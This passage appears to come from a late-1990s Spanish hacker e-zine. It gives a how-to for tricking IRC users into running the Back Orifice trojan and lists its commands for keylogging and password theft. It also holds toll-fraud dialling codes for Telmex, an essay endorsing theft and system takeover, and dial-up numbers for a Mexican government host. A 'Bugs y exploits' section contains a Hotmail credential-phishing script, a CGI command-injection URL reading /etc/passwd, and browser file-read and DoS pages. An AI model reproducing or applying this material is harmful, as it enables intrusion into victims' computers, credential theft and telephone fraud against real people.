debes ejecutar boserve.exe, pues te haria sensible al ataque.
Lo primero que hay que hacer es averiguar la ip del pardillo. Despues hay que
meterle como sea el archivo boserve.exe. Y conseguir que lo ejecute. Aqui
entra en juego la imaginacion de cada uno. El campo ideal de accion es el
IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores
del peligro que les acecha.
4- ¨Como le meto el BO al pardillo?
Hay que elegir una vicima que trabaje bajo windows. Todos sabemos que eso es
facil de averiguar en IRC.
Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe
a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion lo
aceptara sin mayores problemas. Para gente mas desconfiada, intenta colarselo
despues de hacerte tu el desconfiado:
En el canal #intercambio_de_fotos_guarras_muy_fuertes:
Elite: ¨Que tienes para cambiar?
Pardillo: un par de fotos de Barbwired, que esta tremenda.
E: Pero estas seguro de que es Barb de verdad?, que si no no te mando
nada, que ya me la han querido liar...
P: De verdad, que me las acabo de bajar de Playboy!
E: Vale, pues te mando yo una de Barbwired que tb esta muy buena.
P: Anda! Barbwired, a mi me pone toda la pila... Uf!!!
... etc, etc, etc....
Y luego le dices que tienes un ejecutable, que es una animacion de Barbwired
con su novia (todos sabemos que Barb es bisexual). XDDD Asi te llevas por el
morro unas cuantas fotos de Barbwired y encima le cuelas el boserve.exe.
Cuando nuestro amigo Pardillo ejecute la animacion y vea que no sale Barb por
ningun lado se va a coger un cabreo de narices, y con razon. Te disculpas
como buenamente puedas y le dices que el fichero esta defectuoso y que te lo
vas a volver a bajar. Lo que te apetezca, pero queda bien con el tio, para
que no se corra la voz y sigan confiando en ti y en tus fotos guarras. Es
conveniente hacerselo a varios a la vez en privado, para tener un buen numero
de victimas. Con la excusa de volvertelo a bajar, te sales de Irc.
Vuelves a entrar con otro nick y a trabajar.
5 - ¨Como accedo al ordenador del Pardillo?
Pasos a seguir:
a) Copiar boclient.exe en tu directorio raiz, c:\
b) Abrir una ventana de msdos en w95
c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le das
conversacion para que no se vaya.
d) En la ventana de msdos, desde la linea de comandos ejecutar boclient.exe
a continuacion teclea host "IPdelPardillo", sin comillas.
e) En teoria ya estas dentro.
6 - ¨Que puedo hacer una vez dentro?
Puedes hacer maravillas. Pero por algo hay que empezar:
Desde bo tecleas dir. Te mostrara los archivos de su HD.
Si tecleas passes te saldran cosas interesantes, osea, algunas passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Facil.
Cosas bonitas para "perfeccionistas"
Puedes abrirle el puerto http y ver su disco duro comodamente con tu
navegador (A ver si soy capaz de hacerme entender):
Una vez dentro tienes que teclear httpon 80, o sea activar el http y el
puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo cierras
primero con httpoff y el puerto que tenga abierto. Pero, ¨como sabes el
puerto que tiene abierto? ¨un scaneado? Ejecutas el httpon y te dice el
estado del http y el puerto es decir, le cierras los puertos que tenga
abiertos y luego le abres el 80.
Mas comandos (traducido de la documentacion que acompa¤a al BO):
Recuerda que en todo momento hablamos del cliente de texto, el boclient.exe.
appadd Lanza una aplicacion de texto en un puerto tcp. Para controlar una
aplicacion dos o de texto (como el command.com) via telnet.
appdel evita que una aplicacion oiga las conexiones.
applist Da un listado de las aplicaciones que escuchan la conexion en ese
momento.
md Crea un directorio.
dir muestra los archivos y directorios.
rd Borra un directorio.
shareadd Crea un export en el servidor.
sharedel Borra un export.
copy Copia archivos.
del Borra archivos.
find Busca en el arbol los archivos.
freeze Comprime un archivo
melt Descomprime un archivo comprimido con freeze.
view Visor del contenido de un archivo.
httpoff Cierra el servidor http.
httpon Abre el servidor http.
keylog Logea las teclas que se aprietan en el servidor (victima) a un
archivo de texto. El log muestra el nombre de la ventana en que
se tecleo el texto.
keylog stopend Acaba el log de teclado.
capavi Captura video y audio de un dispositivo a un archivo .avi
capscreen Captura una imagen de la pantalla del server a formato .bmp
listcaps da un listado de los dispositivos de entrada de video.
sound ejecuta un archivo de sonido en el servidor (Te lo imaginas?).
netlist Listado de las conexiones de red.
netdisconnect Desconecta el servidor de una red.
netconnect Conecta el servidor a una red.
netview Ve todas las interfaces de red, servidores, dominios .
ping Hace ping al host. Da el nombre del host y la version del vo.
pluginexec Ejecuta un plugin para BO.
pluginkill Cierra el plugin.
pluginlist Da un listado de los plugin activos.
prockill Finaliza un proceso.
proclist Listado de los procesos en curso.
procspawn Ejecuta un programa.
rediradd Redirecciona los paquetes ip entrantes a otra ip
redirdel Para el redireccionamiento.
redirlist Listado de puertos de rediccionamiento activos
regmakekey Crea una entrada en el registro
regdelkey Borra una entrada en el registro.
regdelval Borra un valor del registro.
reglistkeys Listado sub llaves de una llave del registro
reglistvals Listado de los valores de una llave del registro
regsetval establece el valor de una llave del registro
resolve resuelve la direccion ip del server
dialog Crea un cuadro de dialogo con el texto que quieras y el boton ok
info Da la informacion completa del server
lockup cierra el server
passes Muestra las contrase¤as del usuario actual y la del salvapantallas.
Pueden contener basura al final.
reboot Apaga el server y lo reinicia. XDDD
tcprecv Conecta el server a una ip concreta y guarda la data recivida de esa
conexion al archivo especificado.
tcpsend conecta el server a una ip, manda el contenido del archivo
especificado y cierra la conexion
Bueno, ya vemos que se pueden hacer maravillas. Ver epigrafe 9.
8 - ¨Me puedo aprovechar del trabajo de otros?
Por supuesto. Otros ya han hecho la parte mas dura por ti (colar el troyano).
Puedes probar "a ciegas" desde bo cada ip, con el comando host "ip". Si te
funciona el comando dir, ¡¡¡esta infectado!!! O sea, que estas dentro.
Parece ser segun http://www.ntbugtraq.com/ que existen por ahi varios
detectores de B.O. (entre ellos el BoSniffer.zip) que son en realidad
troyanos (con el BOServer + el pluggin SpeakEasy). Este troyano intenta un
login en el canal #BO_OWNED de un servidor IRC con un nick aleatorio
informando ademAs de la IP del "afortunado galardonado" con el troyano.
9 - ¨Puedo formatearle el Disco Duro?
Os pido encarecidamente que no os paseis. No hagais putadas.
Robad fotos porno, cread un dir "Pervertido" o "Mehemetidoentuvida".
Intentad acceder al cdrom. Ejecutadle un archivo de sonido.
Que flipe, pero no abuseis.
Si hace un Netstat vera vuestra ip. Y sabeis que con la IP, y la hora en
que ocurrio todo, el ISP y Timonica, de la mano como hermanos, os pueden
recomendar un bello hotelito... lo de siempre, precaucion.
Apendice - ¨Como puedo escribir mi propio plugin para Back Orifice?
(Traduccion del original que acompa¤a al programa)
Para escribir tu propio plugin para el Back Orifice, solo tienes que crear
una DLL con funciones del tipo:
char *YourFunc(int *active, char *args)
El comando de ejecucion del plugin te permite especificar una dll y un nombre
de funcion del tipo: "dll:_Function". El resto de los parametros son pasados
a tu funcion en los args de los parametros. La unica cosa de la que se ocupa
tu aplicacion es de monitorizar la int al que apunta el activo.
Si ese valor se vuelve 0, el usuario ha pedido que el plugin termine y tu
funcion deberia restablecerse en lo mas rapidamente posible en cuanto se
cierre todo lo que haga falta ser cerrado.
Tu programa puede devolver NULL, o puede devolver a un pointer que apunte a
un bufffer estatico que contenga un mensaje de texto que sera ofrecido al
usuario.
La DLL no se cargara hasta que el texto se copie desde ese buffer.
Y eso es todo lo que hay.
Nota de los autores:
Los acentos se han omitido en aras de la compatibilidad.
La traduccion de la documentacion original ha resultado dificultosa y ha
originado giros linguisticos imposibles. A aquellos mas familiarizados con
textos tecnicos, o que hayan detectado faltas al rigor, se les pide su
colaboracion.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<<FuCKiNG TeLMeX>>
(Aportacion de Juan Pablo)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Paso 1. Marcar el teléfono 629-99-10,
Paso 2. Cuando suene una Voz ...
Paso 3. En seguida Marcar 8019, y
Paso 4. Cuando suene un Tono, en seguida...
Paso 5. Marcar la Lada del Pais y/o Región , y por último ...
Paso 6. Marcar el Teléfono deseado + el botón con la
siguientefigura # (Gato).
CASO II
Paso 1. Marcar el teléfono 258-65-01 + el botón con la
siguiente figura#(Gato).
Paso 2. Cuando suene un Tono , enseguida ...
Paso 3. Marcar 02641414866960, después ...
Paso 4. Marcar la Lada del Pais y/o Región y por último ...
Paso 5. Marcar el Teléfono deseado.
CASO III
Paso 1. Marcar el teléfono 725-63-99,
Paso 2. Cuando suene un Tono ...
Paso 3. En seguida Marcar 00.
Paso 4. Esperar otro Tono y ...
Paso 5. En seguida volver a Marcar 00, después ...
Paso 6. Marcar la Lada del País y/o Región y por último ...
Paso 7. Marcar el teléfono deseado.
CASO IV
Paso 1. Marcar el teléfono 258-65-01 + el botón con la
siguiente figura# (Gato) .
Paso 2. Cuando suene una voz, en seguida
Paso 3. Marcar 02641414866960, después ...
Paso 4. Marcar la Lada del Pais y/o Región y por último ...
Paso 5. Marcar el Teléfono deseado.
CASO V - A
Paso 1. Marcar el teléfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, después ...
Paso 4. Marcar 098 (Lada Internacional) y por último ...
Paso 5. Marcar el Teléfono deseado + el botón con la
siguiente figura# (Gato).
CASO V - B
Paso 1. Marcar el teléfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, después ...
Paso 4. Marcar 095 (Lada USA-CANADA) y por último ...
Paso 5. Marcar el Teléfono deseado + el botón con la
siguiente figura# (Gato).
CASO V - C
Paso 1. Marcar el teléfono 420-98-98.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 7676, después ...
Paso 4. Marcar 098 (Lada Nacional) y por último ...
Paso 5. Marcar el Teléfono deseado + el botón con la
siguiente figura# (Gato).
CASO VI
Paso 1. Marcar el teléfono 91-800-01-670.
Paso 2. Cuando suene un Tono, en seguida
Paso 3. Marcar 94678,
Paso 4. Cuando suene un Tono, en seguida
Paso 5. Marcar 55,
Paso 6. Cuando suene un Tono, en seguida
Paso 7. Marcar 98, por último ...
Paso 8. Marcar el Teléfono deseado.
NOTA IMPORTANTE : Este Caso (VI) Sólo se aplica
en llamadas Internacionales (Europa y el resto del
mundo, exceptuando Estados Unidos y Canada).
CASO VII
Paso 1. Marcar el teléfono 722-73-56,
Paso 2. Espere y cuando suene una Voz ...
Paso 3. En seguida Marque 7349,
Paso 4. Espere y cuando suene una voz,
Paso 5. En seguida Marque 7349,
Paso 6. Espere y cuando suene un Tono,
Paso 7. En seguida Marque 0 (cero),
Paso 8. Espere y cuando suene un Tono,
Paso 9. Marque la Lada del Pais y/o Región , y por último ...
Paso 10. Marque el Teléfono deseado.
CASO VIII
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 100-54 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 1054 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
CASO IX
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 200-26 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 2026 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
CASO X
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 300-31 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 3031 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
CASO XI
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 300-38 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 3038 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
CASO XII
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 300-51 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 3051 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
CASO XIII
Paso 1. Marcar el teléfono 91-800-92-450 + el botón con
la siguiente figura#(Gato).
Paso 2. Marcar 300-26 + el botón conla siguiente figura
#(Gato).
Paso 3. Marcar 3026 + el botón conla siguiente figura
#(Gato).
Paso 4. Marcar 00 (cero), después ...
Paso 5. Marcar la Lada del Pais y/o Región y por último ...
Paso 6. Marcar el Teléfono deseado.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
----------------------
--- Reflexiones de nadie --- ---------------
---------------------- -- Por: Mr.Nexus --
---------------
Esta tarde sali a la calle, apareci en el mundo real, como tantas
veces, y como siempre me canse de l.
Vaya un mundo real en el que la gente solo piensa en matarse los unos a
los otros, me da vergenza pertenecer a un grupo de personas asi, ¨por que
diablos tiene que haber tanta violencia en nuestra sociedad?, gente que solo
piensa en hacer da¤o a los dem s (eso de los fines educativos debe ser una
utopia), y ¨personas? que no tienen m s cerebro que el necesario como para
decir las payasadas que salen por sus bocas, en fin... espero que cuando
crezcan maduren y no se queden tan ... gilipollas.
Por la noche me conecto a la red, por fin! llevaba todo el dia
pensando en lo que iba a hacer, lo que me iba a bajar, lo que iba a probar,
bien! me voy sintiendo como en casa, al fin y al cabo ... esta es mi casa,
aqui es donde me siento bien, donde me siento a gusto con la gente, gente que
aqui no son mas que un apodo que se ponen ellos mismos, son gente ... somos
gente que dejamos atras nuestros prejuicios, nuestros problemas, ...
Pero aaah!, que gran decepcion, ahora Internet se esta expandiendo y
regalan conexiones con las cajas de galletas, ¨qu hace esto?, pues facil
respuesta, esto hace que todo el mundo que tenga ordenador y modem se pueda
conectar, vaya! esto ya no me gusta, empiezo a verme rodeado de esos
gilipollas del mundo real que olvid al entrar en mi mundo. Malditos sean! es
que no se puede estar tranquilo en el IRC, por ejemplo, sin que venga algun
payaso a insultarte, nukearte, ...
La respuesta es no, con lo f cil que es ahora entrar en la red, Toda
esa gentuza indeseable se mete en nuestro mundo, si!, seguro que alguno de
esos cabrones esta leyendo estas lineas y ahora esta diciendo, bufff! Pues
tienes razon, esta conducta no lleva a nada, ... pero cuando apague su
ordenador seguir llendo por ahi con la violencia en las manos y la estupidez
en la cabeza, y mas tarde ... cuando se conecte con el bancotal o con el
bancocual a Internet seguir haciendo lo mismo, pero de otra manera,
aprovechadote de la gente que ha desarrollado nukes (por ejemplo) por el puro
af n de superacion, abusando de la gente que te da el op en algun canal, ...
tan solo son unos pobres hombrecillos.
Hey!, tu!, lector!, acaso no piensas como yo?, dime la verdad, a quien
le interesa ir por ahi molestando a la gente?, ir por ahi tan solo buscando
problemas?, no lo sabes?, yo te lo dir, a los pobres de mente que se dejan
llevar por las modas, por los estereotipos, a los pringaos que solo piensan en
hacer da¤o a los dem s sin causa aparente.
Hey! no pienses que soy un flojo y un lila, jaja! bueno, un poco si,
... tan solo me gustaria vivir en un mundo en el que no existiera la
violencia, las guerras, el hambre, las masacres de humanos iguales que
nosotros pero con la *mala suerte* de haber nacido en otro lugar; me gustaria
vivir en un mundo sin racismo, sin prejuicios, sin gentuza a la que solo le
interesa su propio beneficio, y a ti? no te gustaria vivir en ese mundo?, si.
Antes ese mundo era el cyberespacio, un sitio bonito, agradable,
curioso, moderno, infinito, ... perfecto, pero entonces llegaron ellos, y nos
tuvieron que joder el invento, ... gentuza ...
Desde aqui tan solo puedo regocijarme en mis pensamiento que, por
ahora, son solo mios, pero tambin puedo decirte que no te rindas amigo
hacker, lo que haces es la aficion mejor remunerada del mundo, como? que no
ganas dinero? ya lo se, pero no se trata de eso verdad? , y ese afan de
superacion? , esa curiosidad satisfecha? eres simplemente admirable, y por eso
quiero ser como tu, tu el hacker, no creo que a nadie le importe que
transfieras a tu cuenta varios millones del dinero que ha acumulado un sucio
chupon que ha explotado a sus trabajadores, o un politico que se ha llenado
sus bolsillos con el dinero de los ciudadanos, creme, nadie reprocharia tal
acto.
Por todo lo que hacen los hackers autenticos, os admiro, admiro a la
gente de Raregazz, porque de veras comparten su conocimiento; admiro a los
componentes de X-ploit, porque reclaman derechos humanos; admiro a Cy de
CyberHack, porque no se calla al criticar a esos que se aprovechan del trabajo
de los dem s; ... y asi a todos aquellos que se esfuerzan en superarse dia a
dia porque sois geniales, hummm, por que no decirlo? Somos geniales, estamos
muy por encima de toda esa gente que solo busca ... bah! tonterias.
Bueno, esto se acaba, sino seguro que te duermes, en fin tan solo Una
ultima cosa, te pido que si *realmente* piensas como yo, ... como nosotros,
unete a nosotros, todavia quedan lugares en la red a los que esta Restringido
el paso a los debiles de mente, se fuerte!, resiste las acometidas de una
sociedad que da asco y rebelate!, tomaremos sus sistemas, exterminaremos las
plagas de bastardos, es contra ellos contra los que tienes que rebelarte! y
cuando te canses, disfruta de la compa¤ia de la buena gente con la que te vas
cruzando a lo largo de tu vida, esos son tus amigos, nosotros somos tus
amigos.
------------------------------------------------------------------------
Para cualquier critica, "Las guerras las declaran los gobiernos
alabanza o correccion: y las sufren los pueblos"
Cristina Almeida (politica Espa¤ola)
mrnexus@cyberdude.com ^-- parece mentira eh? --^
-----------------------------------------------------
------------ Insultos a dev/null --------------
----------------------------------
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º BUGS Y EXPLOITS º
º por PaTa º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Netscape 3.x y 4.x
Objetivo: DoS usando nested tables demtro de etiquetas span
Parche: -
Creditos: Leonid Ksido
Descripcion: Testeado en Communicator 4.05 en Linux Slackware 3.4, y
Navigator 4.05 en Windows 98
Codigo:
<HTML>
<SPAN STYLE="position:absolute; LEFT:0">
<TABLE BORDER="0" WIDTH=100%>
<TR>
<TD>
<TABLE>
<TR>
<TD>
</TD>
</TR>
<TR>
<TD>
<TABLE>
<TR>
<TD>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
</SPAN>
</HTML>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: CGI-Script
Objetivo: Ejecutar comandos de forma remota
Parche: Quitar `faxsurvey.orig'
Creditos: Tom <dod@MUENSTER.NET>
Descripcion: Existe un bug en el "faxsurvey" CGI-Script, que permite
ejecutar comandos en el servidor HTTP
Versiones afectadas S.u.S.E. 5.1 y 5.2 Linux.
Codigo: http://joepc.linux.elsewhere.org/cgi-
bin/faxsurvey?/bin/cat%20/etc/passwd
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Linux RedHat 5.1
Objetivo: DoS
Parche: ftp://ftp.solucorp.qc.ca/pub/linuxconf/devel/redhat-
5.1/linuxconf-1.11r19-1.i386.rpm
Creditos: Alex Mottram
Descripcion: Existe un problema de seguridad con linuxconf-1.11.r11-rh3/i386
si lo
actualizas desde el FTP de RedHAT.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: HOTMAIL
Objetivo: Obtener las claves de los usuarios
Parche: Descativar Java
Creditos: Tom Cervenka
Descripcion: Mediante al ejecucion de un codigo en java malicioso al leer
los mensajes con el navegador que estemos usando, que fuerza
al usuario a volver a registrarse e introducir de nuevo su
cuenta y su contrase¤a, sin saber que en realidad esta mandando
al atacante estos datos.
Codigo:
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5
width=508
height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:
</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\"
color=\"#ff0000\"><b>Time expired. Please re-
login.</b></font><br>"
+
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"(Get">http://www.hotmail.com/errormsg.html\">(Get
more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-
bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\"
VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\"
border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\"
size=\"2\">Login
Name:</font><br><input type=\"text\" name=\"login\"
size=\"16\"
maxlength=\"16\"></td><td><font face=\"Arial,
Helvetica\"
size=\"2\">Password:</font><br><input
type=\"password\"
name=\"passwd\" size=\"16\" maxlength=\"16\"> <input
type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a
href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\"
width=189 height=16
border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Win98
Objetivo: Efecto 2000
Parche: No encender el ordenador en Noche Vieja
Creditos: -
Descripcion: El bug aparece cuando Windows 98 es reiniciado entre las 23:59
y las 00:00 y hace que el ordenador salte uno o dos dias hacia
atras, de pendiendo de la hora exacta de reset. Por ahora esto
solo ocuure el 31 de Diciembre.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-
S.O/Programa: Internet Explorer
Objetivo: Leer ficheros locales
Parche: http://www.microsoft.com/security/bulletins/ms98-013.htm
Creditos: Georgi Guninski
Descripcion: Esta nueva vulnerabilidad permite a una p gian Web dise¤ada
maliciosamente leer archivos de texto o html del ordenador del
usuario y enviar sus contenidos a un host arbitrario, incluso
cuando el usuario se encuentra detr s de un firewall. El
agujero explota un error de seguridad en los frames y se basa
en la utilizacion de instrucciones en JavaScript. Para que
funcione se debe conocer de antemano el nombre y camino
completo del fichero que se quiere leer, cosa nomuy dificil.
Versiones afectadas:
- Microsoft Internet Explorer 4.0, 4.01 y 4.01 SP1 sobre
Windows NT 4.0, Windows 95
- Microsoft Windows 98, Internet Explorer iontegrado
(version 4.01 SP1)
- Microsoft Internet Explorer 4.0 y 4.01 para Windows 3.1
y Windows NT 3.51
- Microsoft Internet Explorer 4.0 y 4.01 para Macintosh
- Microsoft Internet Explorer 3.x
Codigo:
<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer
4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>
<SCRIPT LANGUAGE="JAVASCRIPT">
alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\"
)
");
</SCRIPT>
</BODY>
</HTML>
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
$$$$$ $$
"$$$$$$$$$$$$$$$" $$ ooo $$$$$ooo oooo
"$$$$$$$$$$" "$$" o$$ $$o "$$$$$$$$$ $$$$$$$$$$
$$ "$$$$$$" $$ $$oo $$$$$$$$$$o """ o$$$"
$$$o "$$$$" $$$ o$$" $$$"""$$"" $$$ oooo
$$$$oo $$$$ $$$$$ ooo$$$ooo $$$oooo$$$ o$$$ooooooo$$$$$$$$$
$$$$$$$ooo $$ ooo$$$$$$$ """""""" """""" """""""" """"""""""
$$$$$$$$$$$$$$$$$$$$$$$$$$ oooo ooo
$$$$$$$""" $$o """$$$$$$$ ""$$ $$$$
$$$$"" $$$o ""$$$$ $$$oooo $$$$$$$o oooooo $$$ oooooo
$$$" o$$$$o "$$$ "$$$$""$$o "$$$$ o$$""$$$$ $$" $$$"""
$$ o$$$$$$$ $$ $$$$ $$$ "$$$$""$$$$ $$$ "" $$$$$$ ""
o$$$$$$$$$$o $$$ $$o $$$o o$$$$o $$$ $$"" $$o
o$$$$$$$$$$$$$$$$o o$$$$$ $$$$$ """" """""" "$$$$$$$" $$$$ $$$$$o
\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\/
Pues bien, aqui esta de nuevo esta vieja seccion, espero que les guste y
que me ayuden a mantenerla viva.....
Lo que sigue es un sistema que al parecer los se¤ores de X-ploit TEAM lo han
de conocer muy bien, es cenids.ssa.gob.mx y aqui esta una lista de telefonos
y velocidades a las que puedes conectarte:
14,400 bps : 9,600 bps: 2,400 bps:
563-8471 598-7761 598-1467
563-7895 598-1010 598-4208
563-8405
563-9404
Bueno pues por esta ocasion eso es todo, esperamos contar con su apoyo
para hacer crecer esta seccion.
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
------------------------------
Accediendo al IRC por telnet
por Senpai
------------------------------
Alguna vez has pensado como se comunica tu cliente de IRC (el mIRC por ej.)
con el servidor de IRC?. No? Yo tampoco hasta que tuve una conversacion en
la Under con jcl (un saludo chavalote!).
Conectarse al IRC con el telnet
-------------------------------
Si te conectas al IRC via telnet, puedes saber exactamente que cosas le
envias al servidor, y que cosas te envia el servidor a ti, con un cliente de
irc todo esto lo pierdes, simplemente te conectas, chateas un rato, y te vas;
pero como estamos aprendiendo lo mejor es saber como funcionan las cosas, y
no hacer como si fueran una "caja negra" de donde entran y salen mensajes.
Vamos a la practica
-------------------
Lo primero que quiere de ti un servidor de IRC es un password (opcional), y
un nick. Una vez le has proporcionado estos datos, te envia un ping al que
tienes que responder (si no respondes te desconecta!), y despues de hacer
esto le tienes que enviar un mensaje identificando el usuario (tu).
Vamos a ver esto con un ejemplo real:
Ejecuta algun programa de telnet, y haz telnet al servidor de IRC. Tendras
que usar algun puerto que tengan destinado a IRC (normalmente el 6667 lo
tienen todos disponible).
Una vez hecho esto, te conectara, pero no aparece nada por pantalla.
Dale un password (el que quieras, da igual). La sintaxis es:
PASS password
Ej:
PASS hola
Despues le das el nick que quieras.
Sintaxis: NICK nick
Ej:
NICK pableras
Si el nick esta ocupado el servidor te enviara un mensaje para que pongas
otro.
Una vez el servidor acepta el nick, te envia un PING con un numerito, algo
asi:
PING :11528997809137948565
y tu te tienes que responder con un PONG y el numerito. Escribe:
PONG 11528997809137948565
Date prisa en responder, porque si no te desconecta por "ping timeout".
El servidor te enviara un ping de este tipo de forma periodica mientras
estes conectado, cada vez que te envie uno, tienes que responderlo, que si
no te desconecta.
Una vez echo esto le tienes que enviar un mensaje de USER.
Sintaxis: USER NombreDeUsuario NombreDelHost NombreDelServidor NombreReal
Atencion al poner el nombre real, debes poner dos puntos(:) antes.
Ej:
USER pepe aki alli :Pepito de los palotes
Una vez hecho esto te enviara un mensaje de bienvenida.
Esto es un trozo de un log real:
pass dsthgdi
nick pep_1
PING :11528277839637248565
pong 11528277839637248565
user sol solo sol :TO
:fenix.irc-hispano.org 001 pep_1 :Welcome to the Internet Relay Network pep_1
:fenix.irc-hispano.org 002 pep_1 :Your host is fenix.irc-hispano.org, running version u2.9.32
:fenix.irc-hispano.org 003 pep_1 :This server was created Fri Feb 7 1997 at 17:07:32 MET
:fenix.irc-hispano.org 004 pep_1 fenix.irc-hispano.org u2.9.32 dioswk biklmnopstv
:fenix.irc-hispano.org 251 pep_1 :There are 2151 users and 1382 invisible on 21servers
